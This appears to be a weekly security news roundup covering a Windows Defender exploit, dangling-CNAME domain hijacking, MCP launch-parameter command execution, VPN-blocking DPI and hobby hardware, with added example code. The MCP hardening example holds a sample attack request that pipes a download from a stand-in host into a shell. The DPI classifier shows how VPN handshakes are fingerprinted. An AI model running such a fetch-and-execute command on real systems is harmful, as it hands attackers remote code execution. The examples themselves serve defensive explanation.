This Week In Security: Annoyed Researchers, Dangling DNS, And Hacks That Could Have Been Worse

The author of the BlueHammer exploit, which was released earlier this month and addressed in the last Patch Tuesday, continues to be annoyed with the responses from the Microsoft security research and vulnerability response team, and has released another Windows zero-day attack against Windows Defender.

The RedSun exploit targets a logic and timing error in Windows Defender, convincing it to write the target file into the system instead of quarantining the file and protecting the system. Not, generally, what you would hope would happen.

Since the RedSun attack requires local access in the first place, it seems unlikely Microsoft will release an out-of-band patch for it; however, with public code available, we can probably expect to see malware leveraging it to gain elevated privileges on an already infected system.

Releasing exploits out of spite feels like a return to the late 1990s, and I almost don’t hate it.

University Domains Hijacked

Reported in Bleeping Computer, a group tracked as “Hazy Hawk” has been hijacking unmaintained DNS records of universities and government institutions to serve ad click spam.

The attack is simple and doesn’t even require compromising the institution itself: it relies on dangling DNS “CNAME” records. A “CNAME” entry in DNS acts essentially as an alias, pointing one domain name at another. It is commonly used to serve content under an official domain from a cloud service whose IP address may change.

A DNS “A” (or “AAAA” if you speak IPv6) record points a hostname, like “foo.example.com”, to an IP address, like “1.1.1.1”. A “CNAME” record points a hostname to another hostname, like “foo.some_cloud_host.com”. Scanning “high value” domains (like Ivy League universities) for “CNAME” records which point to expired domains (or to names on cloud hosting providers that no longer exist) lets anyone who can register that domain (or create an account with the proper name on the cloud host) publish any content they wish, while still appearing under the original name. The fix is housekeeping: delete the CNAME when the thing it points at is decommissioned, and periodically resolve every CNAME in your zones to catch the ones that were missed.

At least 30 educational institutions have been impacted, along with several government agencies including the CDC.
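Here is a small dangling-CNAME checker, written for this summary and not taken from the Bleeping Computer report or from any scanner Hazy Hawk is known to use. It follows CNAME chains, flags targets that no longer exist or never resolve to an address, and separates “the cloud name is claimable” from “the registrable domain is dead”. The zone data and the list of takeover-prone suffixes are constructed for the example; a real run would plug in a live resolver.

```python
"""Dangling-CNAME finder. Added example; the sample zone and the
TAKEOVER_PRONE list are constructed for illustration."""
from typing import Callable, List, Optional, Tuple

# A lookup returns the records for a name as (type, value) tuples, or
# None when the name does not exist at all (NXDOMAIN).
Lookup = Callable[[str], Optional[List[Tuple[str, str]]]]

# Hosting suffixes where an unused hostname can be claimed just by creating
# an account with the right name. Illustrative, not exhaustive.
TAKEOVER_PRONE = (
    ".azurewebsites.net",
    ".cloudapp.azure.com",
    ".s3.amazonaws.com",
    ".herokuapp.com",
    ".github.io",
)

def follow_cname(name: str, lookup: Lookup, max_hops: int = 8):
    """Walk the CNAME chain from name. Returns (chain, status) where status is
    'ok' (chain ends in A/AAAA), 'nxdomain' (a hop does not exist),
    'unresolved' (exists but has no address or CNAME) or 'loop'."""
    chain = [name]
    seen = {name}
    for _ in range(max_hops):
        recs = lookup(chain[-1])
        if recs is None:
            return chain, "nxdomain"
        types = {t for t, _ in recs}
        if "A" in types or "AAAA" in types:
            return chain, "ok"
        cnames = [v for t, v in recs if t == "CNAME"]
        if not cnames:
            return chain, "unresolved"
        nxt = cnames[0].rstrip(".").lower()
        if nxt in seen:
            return chain + [nxt], "loop"
        seen.add(nxt)
        chain.append(nxt)
    return chain, "loop"

def find_dangling(hosts, lookup: Lookup):
    """Return (host, final_target, status, risk) for every host whose CNAME
    chain does not end at an address record."""
    findings = []
    for host in hosts:
        chain, status = follow_cname(host.lower(), lookup)
        if len(chain) < 2:
            continue  # plain A/AAAA record, no CNAME involved
        target = chain[-1]
        if status in ("nxdomain", "unresolved"):
            # A claimable cloud name needs only an account; a dead registrable
            # domain needs a WHOIS/RDAP check to see whether it can be bought.
            risk = "claimable-cloud-name" if target.endswith(TAKEOVER_PRONE) else "dead-target"
            findings.append((host, target, status, risk))
        elif status == "loop":
            findings.append((host, target, status, "loop"))
    return findings

# Constructed zone data standing in for live DNS answers.
SAMPLE_DNS = {
    "www.example.edu":      [("A", "192.0.2.10")],
    "alumni.example.edu":   [("CNAME", "alumni-site.azurewebsites.net.")],  # app deleted
    "research.example.edu": [("CNAME", "oldlab-cdn.example-hosting.net.")],  # domain expired
    "lib.example.edu":      [("CNAME", "www.example.edu.")],                 # healthy alias
    "a.example.edu":        [("CNAME", "b.example.edu.")],
    "b.example.edu":        [("CNAME", "a.example.edu.")],                   # misconfigured loop
}

def sample_lookup(name: str):
    return SAMPLE_DNS.get(name)

if __name__ == "__main__":
    for row in find_dangling(SAMPLE_DNS, sample_lookup):
        print(*row)
```

To run this against real zones, replace `sample_lookup` with a function built on dnspython’s `dns.resolver.resolve(name, rdtype)`, returning `None` on `dns.resolver.NXDOMAIN` and an empty list on `dns.resolver.NoAnswer`, and feed it every name in your zone export.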

How Anthropic’s Model Context Protocol Allows For Easy Remote Execution

As part of the effort to push Large Language Model (LLM) ‘AI’ into more and more places, Anthropic’s Model Context Protocol (MCP) has been adopted as the standard for connecting LLMs to external tools and systems in a client-server model. A slight oversight in the architecture of this protocol is that remote command execution (RCE) of arbitrary commands is effectively an essential part of its design, as covered in a recent article by [OX Security].

The details are in OX Security’s breakdown, and the problem applies to all implementations regardless of programming language. Essentially the StdioServerParameters object, MCP’s description of how to launch a server over the stdio transport, carries an arbitrary command and argument list that the receiving side executes as a subprocess. Any component that accepts those parameters from an untrusted party is handing that party command execution on the host that does the spawning.
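To make the point concrete, here is the exposed pattern beside a hardened one. This is an added example, not code from the MCP SDKs or from the OX Security write-up; `exposed_launch()`, `hardened_launch()`, `ALLOWED_SERVERS` and the `/opt/mcp` paths are inventions for the illustration. Both functions return the argv they would spawn rather than spawning it, so the example runs harmlessly.

```python
"""Accepting StdioServerParameters-shaped input from a request: the
command-execution sink, and a registry-based alternative. Added example."""
import re

def exposed_launch(payload: dict) -> list:
    """The risky shape: the caller's 'command' and 'args' become argv.
    In a real server this list goes to subprocess.Popen or the stdio
    transport, and whoever controls the request owns the host."""
    return [payload["command"], *payload.get("args", [])]

class RejectedLaunch(ValueError):
    """Raised when a launch request does not match the operator's registry."""

# Operator-controlled registry (hypothetical paths): a server *name* selects
# a fixed binary, and only the listed options may be supplied by the caller.
ALLOWED_SERVERS = {
    "filesystem": {"argv": ["/opt/mcp/bin/mcp-filesystem"], "options": {"--root"}},
    "sqlite":     {"argv": ["/opt/mcp/bin/mcp-sqlite"],     "options": {"--db", "--readonly"}},
}
# Option values: a conservative character set, no whitespace, no '..'.
SAFE_VALUE = re.compile(r"^(?!.*\.\.)[A-Za-z0-9_./:=-]{1,128}$")
MAX_ARGS = 6

def hardened_launch(payload: dict) -> list:
    """Build argv from a server name plus vetted options. The command itself
    never comes from the request, and the result is an argv list rather
    than a shell string, so there is no shell to inject into either."""
    entry = ALLOWED_SERVERS.get(payload.get("server"))
    if entry is None:
        raise RejectedLaunch(f"unknown server {payload.get('server')!r}")
    args = payload.get("args", [])
    if not isinstance(args, list) or len(args) > MAX_ARGS:
        raise RejectedLaunch("bad argument list")
    for a in args:
        if not isinstance(a, str):
            raise RejectedLaunch("non-string argument")
        if a.startswith("-"):
            if a not in entry["options"]:
                raise RejectedLaunch(f"option {a!r} not permitted")
        elif not SAFE_VALUE.match(a):
            raise RejectedLaunch(f"value {a!r} rejected")
    return [*entry["argv"], *args]

def rejects(payload: dict) -> bool:
    """True if the hardened path refuses this request."""
    try:
        hardened_launch(payload)
    except RejectedLaunch:
        return True
    return False

# Constructed request bodies: what a legitimate client and an attacker send.
LEGIT_REQUEST = {"server": "filesystem", "args": ["--root", "/data/public"]}
ATTACK_REQUEST = {"server": "filesystem", "command": "bash",
                  "args": ["-c", "curl http://evil.example/x | sh"]}

if __name__ == "__main__":
    print("exposed:", exposed_launch(ATTACK_REQUEST))   # attacker's argv, untouched
    print("hardened:", hardened_launch(LEGIT_REQUEST))
    print("attack rejected:", rejects(ATTACK_REQUEST))
```

The test that matters in review is simple: if any field of the request can end up in position zero of an argv list, the endpoint is a remote shell with extra steps, however the protocol describes it.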

Reviving Nintendo’s Early Arcade Game, Wild Gunman

There’s retrogaming, and then there’s retro gaming. This next project falls into the second category, as [Callan] of 74XX Arcade Repair digs into the original Wild Gunman, first released by Nintendo way, way back in 1974 — on 16 mm film. Yes, it was a film-based arcade machine, but how else were you going to get realistic graphics just two years after PONG?

The game had two 16 mm projectors, with four different sets of film reels available, each depicting five gunmen. Unfortunately for [Callan], the film is all he has, so he’s not so much repairing as re-creating the historic game. Luckily, he had the manuals, so at least he knew how it was supposed to come together.

One projector did most of the work, showing the gunmen and a hidden timing signal for the game to know when the user could shoot; the other only activated if the user pulled the trigger at the correct time. Interestingly the ‘gun’ has an IR illuminator that bounced infrared light off the screen to a detector in the cabinet — much like later TV remotes. That makes for a rather large circular hitbox around the enemy gunslinger, which is perhaps not a bad thing for a game likely to be found in a bar.

WSL9x: Add A Linux Subsystem To Your Windows 9x

Considering that Windows NT has the concept of so-called ‘subsystems’, whereby different environments run side-by-side on the same kernel, starting with the POSIX subsystem and later the Windows Subsystem for Linux (WSL), it was probably only a matter of time before someone decided that doing this with Windows 9x was also completely reasonable. Ergo we now have [Hailey Somerville]’s Linux Subsystem for Windows.

To make running Linux inside Windows 9x work, it was necessary to heavily patch a Linux kernel, since, unlike the NT kernel, the Windows 9x kernel makes no provision for such subsystems. Correspondingly, the Linux kernel is based on User-mode Linux and hacked to call Windows 9x kernel APIs instead of the POSIX ones.

In order to use WSL9x you thus need to build said modified Linux kernel – currently at version 6.19 – along with a disk image containing an installed copy of Windows 9x. From there WSL9x can be loaded with the wsl command and you’re then free to cooperatively run the Win9x and Linux kernel side-by-side. This is reminiscent of Cooperative Linux (coLinux), which did something similar except with Windows NT and Linux kernels running side-by-side, and of course we have WSL2 with Windows 10+.

Thanks to [adistuder] for the tip.

Encrypting Encrypted Traffic To Get Around VPN Bans

VPNs, Virtual Private Networks, aren’t just a good idea for keeping your data secure: for millions of people living under restrictive regimes they’re the only way to get full access to the internet. What do you do when your government orders ISPs to ban VPNs, as Russia has done recently? [LaserHelix] shows us one way to cope, which is to use a Shadowsocks proxy.

If you’re not deep into network traffic, you might be wondering: how can an ISP block VPN traffic? Isn’t that stuff encrypted? Yes, but while the traffic going over the VPN is encrypted, you still need to connect to your VPN’s servers, and those handshake packets are easy enough to detect: WireGuard and OpenVPN both open a session with a packet that has a fixed header and a fixed length. You can see it at home with Wireshark, a tool that shows up fairly often on these pages. Of course, if they can ID those packets, they can block them.

So you need a way to obscure what exactly the encrypted traffic you’re sending is. Luckily that’s a solved problem: Chinese hackers came up with something called Shadowsocks back in 2012 to help get around the Great Firewall, and have been in an arms race with the authorities ever since.

Shadowsocks is not, in fact, a sibling of Gandalf’s horse as the name might suggest, but a tool to obfuscate the traffic going to your VPN. To invert a meme, you’re telling the authorities: we heard you don’t like encrypted traffic, so we put encryption in your encrypted traffic so you have to decrypt the packets before you recognize the encrypted packets.
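What a DPI box actually keys on, and what it is left with once Shadowsocks is in the way, is easy to show. The classifier below is an added example and not from [LaserHelix]’s write-up: the WireGuard and OpenVPN byte layouts come from those protocols’ specifications, the packets are constructed with a seeded generator standing in for key material and ciphertext, and the “set bits per byte” and printable-ASCII heuristics follow the shape of tests that have been documented in use by the Great Firewall against fully encrypted traffic.

```python
"""First-packet classification the way a censor's DPI might do it.
Added example; packets below are constructed."""
import random

def looks_random(p: bytes) -> bool:
    """Heuristic for 'fully encrypted' traffic: the average number of set
    bits per byte sits near 4.0 (3.4..4.6 here) and fewer than half the
    bytes are printable ASCII. Payloads under 64 bytes are not judged."""
    if len(p) < 64:
        return False
    set_bits = sum(bin(b).count("1") for b in p) / len(p)
    printable = sum(32 <= b <= 126 for b in p) / len(p)
    return 3.4 <= set_bits <= 4.6 and printable < 0.5

def classify_udp_payload(p: bytes) -> str:
    # WireGuard handshake initiation: message type 1, three reserved zero
    # bytes, and always exactly 148 bytes on the wire.
    if len(p) == 148 and p[0] == 1 and p[1:4] == b"\x00\x00\x00":
        return "wireguard-handshake-init"
    # WireGuard handshake response: type 2, always 92 bytes.
    if len(p) == 92 and p[0] == 2 and p[1:4] == b"\x00\x00\x00":
        return "wireguard-handshake-resp"
    # OpenVPN over UDP without tls-auth/tls-crypt: byte 0 is
    # (opcode << 3) | key_id, opcode 7 being P_CONTROL_HARD_RESET_CLIENT_V2.
    # Then an 8-byte session id, an ack-array length of 0 (nothing to ack
    # yet) and message packet id 0 for the first packet of a session.
    if len(p) >= 14 and (p[0] >> 3) == 7 and p[9] == 0 and p[10:14] == b"\x00\x00\x00\x00":
        return "openvpn-client-reset"
    if looks_random(p):
        return "looks-random"
    return "other"

# Constructed packets. A seeded generator keeps the example reproducible.
_rnd = random.Random(2024)
WG_INIT = b"\x01\x00\x00\x00" + _rnd.randbytes(144)
OVPN_RESET = b"\x38" + _rnd.randbytes(8) + b"\x00" + b"\x00\x00\x00\x00"
SS_FIRST = _rnd.randbytes(300)   # AEAD Shadowsocks: salt + ciphertext, no fixed header
HTTP_GET = (b"GET / HTTP/1.1\r\nHost: example.com\r\n"
            b"User-Agent: curl/8.0\r\nAccept: */*\r\n\r\n")

if __name__ == "__main__":
    for name, pkt in [("WG_INIT", WG_INIT), ("OVPN_RESET", OVPN_RESET),
                      ("SS_FIRST", SS_FIRST), ("HTTP_GET", HTTP_GET)]:
        print(f"{name:10s} {len(pkt):4d} bytes -> {classify_udp_payload(pkt)}")
```

The caveat is in the last label: “looks-random” is itself a signal, and censors have blocked flows on exactly that basis. That is why the arms race moved on to plugins and bridges that dress Shadowsocks traffic up as ordinary TLS or HTTP rather than leaving it as a stream of high-entropy bytes.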

What about the VPN? Well, some run their own Shadowsocks service, while others will need to be accessed via a Shadowsocks bridge: in effect, a proxy that then connects to the VPN for you. That means of course you’re bouncing through two servers you need to trust not to glow in the dark, but you have to trust someone; otherwise it’s off to a shack in the woods, which never ends well.

Don’t forget that while VPNs can get you around government censorship, they do not provide anonymity on their own. If, like tipster [Keith Olson] –thanks for the tip, [Keith]!– you’re looking side-eyed at your government’s “think of the children!” rhetoric but don’t know where to start, we had a discussion about which VPNs to use last year.

This KiCAD Plugin Enables Breadboarding

Some people learning the noble art of electronics find the jump from simpler tools like Fritzing to more complex ones, such as KiCAD, a little daunting, especially since they need to learn at least two tools. Fritzing is great for visualising your breadboard layout, but what if you want to start from a proper schematic, make a prototype on a breadboard and then design a custom PCB? Well, with the Kicad-breadboard plugin for (you guessed it!) KiCAD, you can now do all of this in the same tool.

A simple dual-rail oscillator schematic corresponding to the featured image above

Originally designed to support EE students at the University of Antwerp, the tool presents you with a virtual breadboard of configurable size and style, along with a list of components and tools that can be placed. A few clicks and parts are on the virtual breadboard. Adding wires comes next, for the connections that run across the board rather than along a strip. Finally, assigning power supplies and probe connections completes the process. Drawing a layout is no use if you can’t verify its correctness, and this is where the plugin shines: it can perform an ERC (electrical rules check) between the schematic and the breadboard and flag what you missed. Add to this that you can also perform an ERC at the schematic level, before even thinking about layout, and it’s pretty hard to make an error. Once you have confidence in correctness, you can transfer the layout directly to a real breadboard, or even a veroboard for more permanence. This will definitely save time correcting errors and help keep the magic smoke safely contained within those mysterious black rectangles.

ESP32Synth : An Audio Synthesis Library For The ESP32

With MCUs becoming increasingly powerful, it was only a matter of time before they would enable some more serious audio-processing tasks. [Danilo Gabriel]’s ESP32Synth library is a good example here, providing an ESP-IDF based mixing and synthesis engine with 80+ voices. If you ever wanted to create a pretty impressive audio synthesizer, then all you really need to get started is an ESP32, ESP32-S3 or similar dual-core Espressif MCU with the requisite processing power.

Audio output goes via I2S, requiring only a cheap I2S DAC like the UDA1334A or PCM5102 to be connected, unless you really want to use the internal DAC. With this wired up you get 80 voices by default, with up to 350 voices demonstrated before the hardware can no longer keep up. You can stream multiple WAV files from an SD card for samples, along with the typical oscillators like sine, triangle, sawtooth and pulse, as well as noise, wavetables and more.

In order to make this work in real time a number of optimizations had to be performed, such as the removal of slow floating-point and division operations from the audio path. The audio rendering task is pinned to one core, leaving the other core for application code. While the code is provided as an Arduino project, it uses ESP-IDF APIs, so it can likely be used in a regular ESP-IDF project as well without too much fuss.
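For readers wondering what “no floats and no division in the audio path” looks like in practice, here is the integer phase-accumulator technique that such engines are built on. It is an added example written in Python to show the arithmetic; it is not ESP32Synth code, and the 32-bit phase format, 256-entry table and Q15 gain are this example’s own choices. The floating-point work (building the table, computing a note’s phase increment) happens once, outside the per-sample loop.

```python
"""Integer-only wavetable synthesis: 32-bit phase accumulator, table lookup
from the top bits, Q15 gain, mix-down by shift. Added example."""
import math

SAMPLE_RATE = 48000
TABLE_BITS = 8                    # 256-entry table; index = top 8 bits of phase
# Built once with floats, never touched by the audio loop.
TABLE = [round(32767 * math.sin(2 * math.pi * i / (1 << TABLE_BITS)))
         for i in range(1 << TABLE_BITS)]

def phase_increment(freq_hz: float) -> int:
    """The one float multiply and divide, done per note-on, not per sample."""
    return int(freq_hz * (1 << 32) / SAMPLE_RATE)

class Voice:
    def __init__(self, freq_hz: float, gain_q15: int):
        self.phase = 0
        self.inc = phase_increment(freq_hz)
        self.gain = gain_q15      # 0..32767 represents 0.0..1.0

def render(voices, n_samples: int, mix_shift: int):
    """Return n_samples of int16 output. Per sample, per voice: one shift for
    the table index, one lookup, one multiply and shift for gain, one add
    and mask for the phase. The mix is scaled by a power of two (shift),
    never divided by len(voices), then clamped to int16."""
    out = []
    for _ in range(n_samples):
        acc = 0
        for v in voices:
            idx = v.phase >> (32 - TABLE_BITS)
            acc += (TABLE[idx] * v.gain) >> 15
            v.phase = (v.phase + v.inc) & 0xFFFFFFFF   # wrap, like a uint32_t
        s = acc >> mix_shift
        out.append(max(-32768, min(32767, s)))
    return out

if __name__ == "__main__":
    chord = [Voice(f, 32767) for f in (261.63, 329.63, 392.00, 523.25)]
    block = render(chord, 256, 2)   # four voices, so shift by 2 instead of /4
    print(len(block), "samples, peak", max(block), "trough", min(block))
```

A real engine would add an interpolation step and an envelope per voice, both of which stay integer-only with the same trick: the fractional part of the phase lives in the low bits and is applied with a multiply and a shift. Pinning this loop to one core, as ESP32Synth does, keeps WiFi and application code from stealing cycles between I2S DMA buffers.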